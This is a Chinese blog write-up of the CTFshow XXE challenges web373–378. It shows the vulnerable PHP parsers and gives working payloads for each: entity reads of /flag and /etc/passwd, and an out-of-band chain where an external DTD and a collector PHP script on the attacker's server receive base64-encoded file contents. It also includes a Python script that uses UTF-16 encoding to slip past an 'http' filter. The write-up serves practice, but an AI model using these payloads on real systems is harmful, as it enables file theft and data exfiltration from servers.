CTFshow web入门-xxe

最新推荐文章于 2024-05-01 19:32:43 发布
最新推荐文章于 2024-05-01 19:32:43 发布
阅读量252 收藏
点赞数
文章标签: php linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74097148/article/details/130793604
版权

web373

题目给了一个有xxe漏洞的,并且文件内容可以回显

<?php
error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    $ctfshow = $creds->ctfshow;
    echo $ctfshow;
}
highlight_file(__FILE__);
?>

payload如下,bp抓包发送即可

<?xml version="1.0"?>
<!DOCTYPE xml [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<H3rmesk1t>
	<ctfshow>
		&xxe;
	</ctfshow>
</H3rmesk1t>

web374-376

<?php
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);    
?>

与上一题大差不差,但文件内容不可回显,那我们可以让我们传入的xml之后所读取的文件内容,转到我们的服务器上查看

bp抓包发送如下内容

<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % dtd SYSTEM "http://xxx/pd.dtd">
%dtd;
%send;
] >

提前服务器上创建pd.dtd

<!ENTITY % all
"<!ENTITY &#x25; send SYSTEM 'http://xxx/xxe.php?q=%file;'>"
>
%all;

提前服务器上创建xxe.php

<?php
highlight_file(__FILE__);
$xxe = base64_decode($_GET['q']);
$txt = 'flag.txt';
file_put_contents($txt,$xxe,FILE_APPEND)
?>

发送后发现服务器上多了flag.txt

下面两关分别是过滤了xml,version=1或0

过滤了xml,version=1或0,和大小写

不过上述的payload是通杀的

web377

<?php
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"|http/i', $xmlfile)){
    die('error');
}
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
?>

过滤了http

也是要在远程服务器配置dtd,同上

python完成post,记得设定编码方式

import requests

url = 'http://xxx'
data = """<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % dtd SYSTEM "http://xxx/pd.dtd">
%dtd;
%send;
] >"""

requests.post(url ,data=data.encode('utf-16'))
print("done!")

done完会看到服务器上生成flag.txt

web378

抓包发现,回显usename,那就是标准的xxe了

构造payload如下 

<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY file SYSTEM "file:///flag">
]>
<user>
<username>&file;</username>
<password>123</password>
</user>

 

hybcx
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
第39天:WEB漏洞-XXE&XML之利用检测绕过全解1
08-03
(2)外部文档声明 (1)内部实体声明 (2)外部实体声明 (3)参数实体声明
WebGoat8-xxe注入漏洞分析
09-15
Web 应用程序安全测试中,XXE(XML External Entity)注入漏洞是一种常见的漏洞,攻击者可以通过该漏洞读取服务器上的敏感信息甚至控制服务器。下面是对 WebGoat8 中的 XXE 注入漏洞的分析。 XXE 注入漏洞的工作...
CTFshow-Web入门-Web1-20 (信息收集完结篇)
m0_61155226的博客
03-07 7411
CTFshow-Web入门-Web11-20 (信息收集完结篇)
CTFShow-Web入门
weixin_58546222的博客
12-15 655
CTFShow爆破解题思路
ctfshow web入门 sql注入 web201--web208
最新发布
2301_81040377的博客
05-01 380
这是hackbar看到的cookie,没有的就是错误cookie就可以用hackbar。提示sql语句需要闭合,但是我们不需要处理,因为sqlmap可以帮忙处理。很奇怪别人看cookie都是应用程序看 的我在内存看的。抓包传cookie(鉴权)再sqlmap。常用sqlmap脚本。
CTFShow-WEB入门篇--信息搜集详细Wp
Aluxian_的博客
06-02 2144
CTFShow-WEB入门篇--信息搜集详细Wp
ctfshow-Web入门-sherlock
m0_58327783的博客
04-13 486
信息泄露可以参考https://blog.csdn.net/a597934448/article/details/105431367。
《CTFshow-Web入门》05. Web 41~50
学习学习学习......
04-10 1205
eval() 利用与正则绕过,或运算【|】构造可用字符、system() 利用与正则绕过,{>/dev/null 2>&1} 绕过。
java8看不到源码-Apache-OFBiz-XXE:ApacheOFBiz<16.11.04的XXE注入(文件泄露)漏洞利用
06-04
XXE Apache OFBiz < 16.11.04 的 XXE 注入(文件泄露)漏洞利用 信息 16.11.04 版本之前的 Apache OFBiz 包含两个不同的 XXE 注入漏洞。 每个漏洞的公开披露可以在下面找到: [1] [2] 此漏洞利用针对链接 1 中...
SAML-XXE-Test:专为SAML接口生成的简单XXE测试套件
05-18
SAML-XXE-测试 一个专门为SAML接口生成的简单XXE测试套件。 介绍 是一种基于XML的标记语言,SAML端点使用的XML解析器可能容易受到。 SAML消息通常使用Base64Url()编码进行传输,并且可能会另外放气(取决于所使用的...
XXE - 防御策略-01
09-15
XXE 防御策略 XXE(Xml External Entity)漏洞是一种常见的 XML 解析漏洞,攻击者可以通过构造恶意 XML 文档来读取敏感信息或执行系统命令。为了防御 XXE 漏洞,需要了解其成因和防御策略。 一、XXE 漏洞消亡原因 ...
ctfshow中web入门题关键解题思路
cutesharkl的博客
07-10 348
查看页面源代码。
CTFweb篇-PHP伪协议的使用
weixin_44597701的博客
08-05 1395
PHP 提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流、标准输入输出和错误描述符, 内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。(不明白啥子鬼意思) 就是PHP伪协议可以用来作为输入输出,以此来占为己用 php://stdin 相当于打开一个文件指针,可以从输入缓冲区读取输入。 ...
ctfshow--web入门web1-web20)
qing_chuan_的博客
05-20 275
mdb文件是早期asp+access构架的数据库文件 直接查看url路径添加/db/db.mdb 下载文件通过txt打开或者通过EasyAccess.exe打开搜索flag flag{ctfshow_old_database}考察vim缓存信息泄露,直接访问url/index.php.swp 注:上面的信息泄露可以参考。在进入/admin/,要登录密码,提示说密码在页面最下方,最下方有个电话号码372619038。考察git代码泄露,直接访问url/.git/index.php。查看源代码,发现flag。
ctfshow web入门 信息搜集
2202_75785935的博客
07-30 98
您可以在您的网站中创建一个纯文本文件robots.txt,在这个文件中声明该网站中不想被robot访问的部分,这样,该网站的部分或全部内容就可以不被搜索引擎收录了,或者指定搜索引擎只收录指定的内容。在var/www/html/nothinghere/fl000g.txt中,找到flag。在url里面访问/nothinghere/fl000g.txt。在url里输入/backup.sql,backup是备份的意思。phps文件泄露,我们可以访问index.phps,保存文件。在url后面添加/admin/
CTF-show WEB入门--web2
m0_73912575的博客
10-25 215
CTF.show WEB入门--web2 解题write up
ctfshow web入门 (命令执行)
m0_69289738的博客
09-04 130
这题与上题相似,多过滤了一个system和php,这题就使用反引号执行代码,因为php被过滤,所以用问号代替。使用system('ls')看到有flag.php,直接cat flag.php,查看源代码得到flag。使用system命令把flag.php记录到1.txt。输入system('ls')发现flag.php。我们使用问号代替,再次访问,拿到flag。或者tac flag.php得到flag。我们直接访问flag.php是不会显示的。发现不行,因为flag被过滤了。访问1.txt,拿到flag。
渗透测试-ctfshow 爆破(web入门
保持微笑的博客
12-29 4876
渗透测试-ctfshow 爆破(web入门
ctfshow_Web入门1-20
weixin_72330127的博客
12-08 888
ctfshow_web入门1-20wp
ctfshow web 入门xxe
08-23
根据提供的代码和引用内容,ctfshow是一个XML实体节点,而xxe是用来指代外部实体的名称。在给定的代码中,XML实体被加载并解析成一个SimpleXMLElement对象,然后从中提取了ctfshow节点的值,并进行输出。通过提供合适的XML实体值,可以利用XXE(XML外部实体注入)漏洞来执行一些攻击,比如读取文件内容等。 要利用XXE漏洞进行ctfshow的Web入门,可以构造一个恶意的XML实体,例如: <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <test> <ctfshow>&xxe;</ctfshow> </test> 这个恶意的XML实体中,xxe指向了文件/etc/passwd,当这个实体被解析时,它的值会被替换为/etc/passwd文件的内容。通过将这个构造好的XML实体发送给目标服务器,可以触发XXE漏洞并读取/etc/passwd文件的内容。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [ctfshow web入门 XXE web373~web378](https://blog.csdn.net/qq_62989306/article/details/126839849)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [ctfshow web入门 XXE](https://blog.csdn.net/jie_a/article/details/117532704)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值